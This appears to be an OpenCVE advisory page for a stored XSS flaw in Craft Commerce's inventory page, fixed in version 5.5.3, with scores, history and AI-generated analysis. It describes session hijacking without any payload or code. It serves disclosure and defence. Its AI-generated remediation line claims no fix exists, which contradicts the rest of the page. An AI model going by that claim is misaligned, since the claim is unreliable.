Description
Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Published: 2026-03-10
Score: 8.6 High
EPSS: < 1% Very Low
KEV: No
Impact: Session hijacking via Stored XSS
Action: Patch
AI Analysis

Impact

The vulnerability resides in Craft Commerce, where product titles, variant titles, and variant SKUs displayed on the inventory page are rendered without proper HTML escaping. An attacker can store malicious JavaScript in these fields, which then executes when any user—including administrators—accesses the inventory management screen. The injected script can steal session cookies or hijack the administrator’s session, allowing full control over the ecommerce site. This is a classic stored XSS flaw (CWE-79).

Affected Systems

The affected product is Craft Commerce, built on Craft CMS, for all deployments using versions earlier than 5.5.3. The flaw exists in every instance of the inventory page regardless of installation size or scale, so any server running an unsupported build is vulnerable. The fix is available in version 5.5.3, which applies proper escaping to the affected fields.

Risk and Exploitability

The CVSS v3.1 score of 8.6 classifies the issue as high severity. EPSS indicates an exploitation probability of less than 1 %, suggesting that widespread public exploitation has not yet been observed, but the still–high CVSS underscores the potential damage. The vulnerability is not present in the CISA KEV catalog, but since it requires storing malicious input that is later rendered, the most likely attack vectors involve an attacker who can add or edit product or variant details so that the malicious code is stored, or an attacker who lures an administrator to view an item containing the injected code. Given the exposure of the panel for privileged accounts, the risk to confidentiality, integrity, and availability of the ecommerce platform remains significant.

Generated by OpenCVE AI on April 16, 2026 at 09:31 UTC.

Remediation

No vendor fix or workaround currently provided.

OpenCVE Recommended Actions

  • Upgrade Craft Commerce to version 5.5.3 or later, which implements proper HTML escaping on inventory fields.
  • Enforce strict access control on the inventory page so that only verified administrators can view it; consider additional authentication or MFA for admin users.
  • Audit existing inventory records for unexpected HTML or script tags and remove or sanitize any remnants from older, vulnerable versions.

Generated by OpenCVE AI on April 16, 2026 at 09:31 UTC.

Tracking

Sign in to view the affected projects.

Advisories
Source ID Title
Github GHSA Github GHSA GHSA-cfpv-rmpf-f624 Craft Commerce has multiple Stored XSS in Commerce Inventory Page, Leading to Session Hijacking
History

Wed, 11 Mar 2026 17:00:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms craft Commerce
CPEs cpe:2.3:a:craftcms:craft_commerce:*:*:*:*:*:craft_cms:*:*
Vendors & Products Craftcms craft Commerce
Metrics cvssV3_1

{'score': 5.4, 'vector': 'CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N'}

Wed, 11 Mar 2026 15:15:00 +0000

Type Values Removed Values Added
Metrics ssvc

{'options': {'Automatable': 'no', 'Exploitation': 'poc', 'Technical Impact': 'total'}, 'version': '2.0.3'}

Wed, 11 Mar 2026 12:00:00 +0000

Type Values Removed Values Added
First Time appeared Craftcms
Craftcms commerce
Vendors & Products Craftcms
Craftcms commerce

Tue, 10 Mar 2026 20:15:00 +0000

Type Values Removed Values Added
Description Craft Commerce is an ecommerce platform for Craft CMS. Prior to 5.5.3, Stored XSS vulnerabilities exist in the Commerce Inventory page. The Product Title, Variant Title, and Variant SKU fields are rendered without proper HTML escaping, allowing an attacker to execute arbitrary JavaScript when any user (including administrators) views the inventory management page. This vulnerability is fixed in 5.5.3.
Title Multiple Stored XSS in Commerce Inventory Page Leading to Session Hijacking
Weaknesses CWE-79
References
Metrics cvssV4_0

{'score': 8.6, 'vector': 'CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:H/VI:H/VA:L/SC:N/SI:N/SA:N'}

Subscriptions

Craftcms Commerce Craft Commerce
cve-icon MITRE

Status: PUBLISHED

Assigner: GitHub_M

Published:

Updated: 2026-03-11T14:11:09.100Z

Reserved: 2026-03-04T14:44:00.713Z

Link: CVE-2026-29175

cve-icon Vulnrichment

Updated: 2026-03-11T14:10:58.284Z

cve-icon NVD

Status : Analyzed

Published: 2026-03-10T20:16:38.710

Modified: 2026-03-11T16:56:41.960

Link: CVE-2026-29175

cve-icon Redhat

No data.

cve-icon OpenCVE Enrichment

Updated: 2026-04-16T09:45:31Z

Weaknesses